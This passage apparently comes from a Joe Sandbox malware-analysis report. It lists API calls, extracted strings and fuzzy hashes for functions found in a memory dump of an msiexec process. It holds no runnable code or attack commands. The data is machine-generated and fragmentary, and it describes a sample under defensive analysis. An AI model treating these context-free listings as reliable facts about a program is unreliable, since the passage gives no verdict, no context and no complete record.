                                                                      • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                      • String ID: 4$h
                                                                      • API String ID: 4019544885-1856150674
                                                                      • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                      • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                      • String ID: 0$6
                                                                      • API String ID: 4066108131-3849865405
                                                                      • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                      • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                      APIs
                                                                      • memset.MSVCRT ref: 004082EF
                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                      • memset.MSVCRT ref: 00408362
                                                                      • memset.MSVCRT ref: 00408377
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$ByteCharMultiWide
                                                                      • String ID:
                                                                      • API String ID: 290601579-0
                                                                      • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                      • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                      APIs
                                                                      • memchr.MSVCRT ref: 00444EBF
                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                      • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                      • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                      • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                      • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                      • memset.MSVCRT ref: 0044505E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$memchrmemset
                                                                      • String ID: PD$PD
                                                                      • API String ID: 1581201632-2312785699
                                                                      • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                      • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                      • GetParent.USER32(?), ref: 00409FA5
                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                      • String ID:
                                                                      • API String ID: 2163313125-0
                                                                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: free$wcslen
                                                                      • String ID:
                                                                      • API String ID: 3592753638-3916222277
                                                                      • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                      • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040A47B
                                                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                                                      • wcslen.MSVCRT ref: 0040A4BA
                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                      • wcslen.MSVCRT ref: 0040A4E0
                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                      • String ID: %s (%s)$YV@
                                                                      • API String ID: 3979103747-598926743
                                                                      • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                      • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                                      • wcscpy.MSVCRT ref: 0040A6C1
                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                      • String ID: Unknown Error$netmsg.dll
                                                                      • API String ID: 2767993716-572158859
                                                                      • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                      • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                      APIs
                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                      • API String ID: 3176057301-2039793938
                                                                      • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                      • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                      APIs
                                                                      Strings
                                                                      • database %s is already in use, xrefs: 0042F6C5
                                                                      • unable to open database: %s, xrefs: 0042F84E
                                                                      • too many attached databases - max %d, xrefs: 0042F64D
                                                                      • out of memory, xrefs: 0042F865
                                                                      • database is already attached, xrefs: 0042F721
                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpymemset
                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                      • API String ID: 1297977491-2001300268
                                                                      • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                      • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                      APIs
                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                      • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                      • String ID: ($d
                                                                      • API String ID: 1140211610-1915259565
                                                                      • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                      • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                      APIs
                                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                                      • String ID:
                                                                      • API String ID: 3015003838-0
                                                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00407E44
                                                                      • memset.MSVCRT ref: 00407E5B
                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                      • wcscpy.MSVCRT ref: 00407F10
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                      • String ID:
                                                                      • API String ID: 59245283-0
                                                                      • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                      • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                      APIs
                                                                      • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                      • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                      • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                      • API String ID: 3510742995-3273207271
                                                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                      APIs
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                      • memset.MSVCRT ref: 00413ADC
                                                                      • memset.MSVCRT ref: 00413AEC
                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                      • memset.MSVCRT ref: 00413BD7
                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                      • String ID: 3A
                                                                      • API String ID: 3300951397-293699754
                                                                      • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                      • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                      • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                      • String ID: strings
                                                                      • API String ID: 3166385802-3030018805
                                                                      • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                      • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0041249C
                                                                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                      • wcscpy.MSVCRT ref: 004125A0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                      • String ID: r!A
                                                                      • API String ID: 2791114272-628097481
                                                                      • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                      • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                      • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                      • String ID: BIN
                                                                      • API String ID: 1668488027-1015027815
                                                                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00411AF6
                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                      • String ID: AE$.cfg$General$EA
                                                                      • API String ID: 776488737-1622828088
                                                                      • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                      • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040D8BD
                                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                      • memset.MSVCRT ref: 0040D906
                                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                      • String ID: sysdatetimepick32
                                                                      • API String ID: 1028950076-4169760276
                                                                      • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                      • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                      APIs
                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
